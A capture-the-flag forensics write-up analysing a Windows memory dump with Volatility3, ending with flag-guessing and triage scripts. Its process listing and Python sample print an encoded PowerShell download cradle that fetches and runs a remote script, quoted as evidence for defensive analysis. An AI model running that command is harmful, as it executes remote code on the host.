# Honeypot

Santa really encourages people to be on his good list, but sometimes he is a bit naughty himself. He is using a Windows 7 honeypot to capture any suspicious action. Since he is not a forensics expert, can you help him identify any indications of compromise?

1. Find the full URL used to download the malware.
2. Find the malicious process ID.
3. Find the attacker's IP.

Flag Format: `HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum}`

Download Link: http://46.101.25.140/forensics_honeypot.zip

## Flag

Not pwned. :(

## Volatility3

### Installation

```bash
git clone git@github.com:volatilityfoundation/volatility3.git
cd volatility3
pipenv install
pipenv shell
```

### Useful Commands

```bash
# get running processes and pid
python vol.py -f ~/git/htb-santa-ctf/forensics/honeypot/honeypot.raw windows.cmdline.CmdLine

# get all connected ips
python vol.py -f ~/git/htb-santa-ctf/forensics/honeypot/honeypot.raw windows.netstat.NetStat
```

## Notes

- The honeypot.zip file contains a Windows memory dump.
- By using the `volatility3` framework one can extract data from the dump.
- By checking `vol -f honeypot.raw windows.cmdline.CmdLine` the malicious process is quite obvious:

```bash
cat win_cmdline
... snip ...
3504 VBoxTray.exe "C:\Windows\System32\VBoxTray.exe"
3112 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe
3324 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
3344 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3324 CREDAT:14337
2700 powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
3732 conhost.exe \??\C:\Windows\system32\conhost.exe "288449379-1457209856-1923954052-101100547-172367320720102786213404402731845854479
4028 whoami.exe Required memory at 0x7ffdf010 is not valid (process exited?)
4036 HOSTNAME.EXE Required memory at 0x7ffd7010 is not valid (process exited?)
2924 DumpIt.exe "C:\Users\Santa\Desktop\DumpIt.exe"
2920 conhost.exe \??\C:\Windows\system32\conhost.exe "280284285205075330588133904-110126809119471720131011406317-845024101-1158882802
168 dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
```

- The base64 string in the powershell command (the `/e` argument, i.e. `-EncodedCommand`) decodes to a download cradle whose URL serves a rickroll; this has to be the URL.
- The PID of said command is 2700.
- By examining the currently active connections, using `windows.netscan.NetScan`, the following foreign IPs stand out:

```
Volatility 3 Framework 1.0.1

Offset     Proto LocalAddr LocalPort ForeignAddr     ForeignPort State       PID Owner Created
0x2554b460 TCPv4 10.0.2.15 49226     93.184.220.29   80          ESTABLISHED -   -     -
0x261e9d30 TCPv4 10.0.2.15 49228     172.67.177.22   443         ESTABLISHED -   -     -
0x3e2e9cc0 TCPv4 10.0.2.15 49221     212.205.126.106 443         ESTABLISHED -   -     -
0x3ee98d80 TCPv4 10.0.2.15 49229     147.182.172.189 4444        ESTABLISHED -   -     -
0x3f1b0df8 TCPv4 10.0.2.15 49216     212.205.126.106 443         ESTABLISHED -   -     -
0x3f225df8 TCPv4 10.0.2.15 49222     212.205.126.106 443         ESTABLISHED -   -     -
0x3f547008 TCPv4 10.0.2.15 49220     212.205.126.106 443         ESTABLISHED -   -     -
0x3f561438 TCPv4 10.0.2.15 49215     204.79.197.203  443         ESTABLISHED -   -     -
0x3f57c438 TCPv4 10.0.2.15 49218     95.100.210.141  443         ESTABLISHED -   -     -
0x3f58b4c8 TCPv4 10.0.2.15 49217     212.205.126.106 443         ESTABLISHED -   -     -
0x3f58c748 TCPv4 10.0.2.15 49223     212.205.126.106 443         ESTABLISHED -   -     -
0x3f58e9d8 TCPv4 10.0.2.15 49225     172.67.177.22   443         ESTABLISHED -   -     -
0x3f5c6df8 TCPv4 10.0.2.15 49219     95.100.210.141  443         ESTABLISHED -   -     -
```

- By eliminating all the IPs which belong to M$ we end up with a small set of 5 IPs.
- To generate the flag the following shell script was used, sadly with no success.
- I'm unsure about the `... | md5sum` part as this adds a hyphen...

```bash
# generate_flags.sh
#!/bin/bash

# Candidate attacker IPs taken from the netscan output above;
# everything except the Digital Ocean address is commented out.
list=(
  147.182.172.189  # digital ocean
  #172.67.177.22   # cloudflare net
  #212.205.126.106 # greece
  #93.184.220.29   # edgecast
  #95.100.210.141  # akamai
)

# Candidate PIDs from the cmdline listing above
pids=(
  2700 # powershell (the encoded-command process identified above)
  1556 # explorer
  2460 # SearchFilterHo
  2856 # explorer
  3324 # iexplorer
  3344 # iexplorer
)

url="https://windowsliveupdater.com/update.ps1"

for ip in "${list[@]}"; do
  for pid in "${pids[@]}"; do
    echo "Generating flag for $ip and $pid:"
    # show the exact string being hashed
    echo "HTB{echo -n \"${url}_${pid}_${ip}\" | md5sum}"
    # md5sum on stdin prints "<digest>  -"; keep only the 32-char digest,
    # otherwise the trailing "  -" ends up inside the braces
    echo "HTB{$(echo -n "${url}_${pid}_${ip}" | md5sum | cut -d' ' -f1)}"
  done
done
```

- I don't know, maybe the challenge is borked somehow?
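The two listings above can be triaged with a few lines of Python instead of by eye. The following is an added example, not the write-up's own code or a Volatility3 plugin: it decodes the PowerShell `-EncodedCommand` argument (base64 of UTF-16LE text, which is why a plain `base64 -d` shows NUL bytes between the letters), pulls the URL out of the decoded cradle, parses the `NetScan` rows and reports established connections on ports other than 80/443, and builds the flag string with only the 32-character digest inside the braces (the `echo -n ... | md5sum` form leaves a trailing `  -`, which is the hyphen mentioned above). Function names are my own; the sample inputs are rows copied from the `CmdLine` and `NetScan` output above.

```python
"""Triage helpers for the CmdLine and NetScan listings quoted in this write-up.

Added example (not the write-up's code). Sample inputs below are rows copied
from the Volatility3 output above; the helper names are assumptions of mine.
"""
import base64
import hashlib
import re

# Sample input: the PID 2700 row of `windows.cmdline.CmdLine` from the listing above.
CMDLINE_SAMPLE = (
    '2700 powershell.exe "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "/window hidden /e "
    "aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3"
    "AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAA"
    "ZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA=="
)

# Sample input: four `windows.netscan.NetScan` rows (plus header) from the listing above.
NETSCAN_SAMPLE = """\
Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created
0x2554b460 TCPv4 10.0.2.15 49226 93.184.220.29 80 ESTABLISHED - - -
0x261e9d30 TCPv4 10.0.2.15 49228 172.67.177.22 443 ESTABLISHED - - -
0x3ee98d80 TCPv4 10.0.2.15 49229 147.182.172.189 4444 ESTABLISHED - - -
0x3f1b0df8 TCPv4 10.0.2.15 49216 212.205.126.106 443 ESTABLISHED - - -
"""

# powershell.exe accepts -e / -ec / -enc / -EncodedCommand with "-" or "/" as the
# switch character; the argument is base64 of the UTF-16LE script text.
ENCODED_ARG = re.compile(
    r"(?:^|\s)[-/](?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+")


def decode_encoded_command(cmdline_row):
    """Return (pid, script text) for a CmdLine row carrying an encoded command, else None."""
    m = ENCODED_ARG.search(cmdline_row)
    if m is None:
        return None
    pid = int(cmdline_row.split(maxsplit=1)[0])  # first column of the CmdLine output
    try:
        script = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a well-formed encoded command
    return pid, script


def extract_urls(script):
    """All http(s) URLs in a decoded script, in order of appearance."""
    return URL_RE.findall(script)


def parse_netscan(text):
    """Parse NetScan rows (lines starting with a 0x offset) into dicts; skip banner/header."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 7 or not parts[0].startswith("0x"):
            continue
        rows.append({"proto": parts[1], "local": parts[2], "lport": int(parts[3]),
                     "foreign": parts[4], "fport": int(parts[5]), "state": parts[6]})
    return rows


def unusual_established(rows, web_ports=(80, 443)):
    """(foreign IP, port) of established connections not on a normal web port."""
    return [(r["foreign"], r["fport"]) for r in rows
            if r["state"] == "ESTABLISHED" and r["fport"] not in web_ports]


def md5_hex(text):
    """Hex MD5 of text: what `echo -n text | md5sum` prints before the trailing `  -`."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def flag_candidate(url, pid, ip):
    """HTB{md5("<url>_<pid>_<ip>")}, with only the 32-char digest inside the braces."""
    return "HTB{" + md5_hex(f"{url}_{pid}_{ip}") + "}"


if __name__ == "__main__":
    pid, script = decode_encoded_command(CMDLINE_SAMPLE)
    url = extract_urls(script)[0]
    print(f"PID {pid} runs: {script}")
    for ip, port in unusual_established(parse_netscan(NETSCAN_SAMPLE)):
        print(f"non-web foreign endpoint {ip}:{port} -> {flag_candidate(url, pid, ip)}")
```

Run as a script it prints the decoded cradle for PID 2700 and one flag candidate per established connection that is not on 80/443; to reuse it on a real dump, feed it the output of `windows.cmdline.CmdLine` and `windows.netscan.NetScan` line by line instead of the embedded samples.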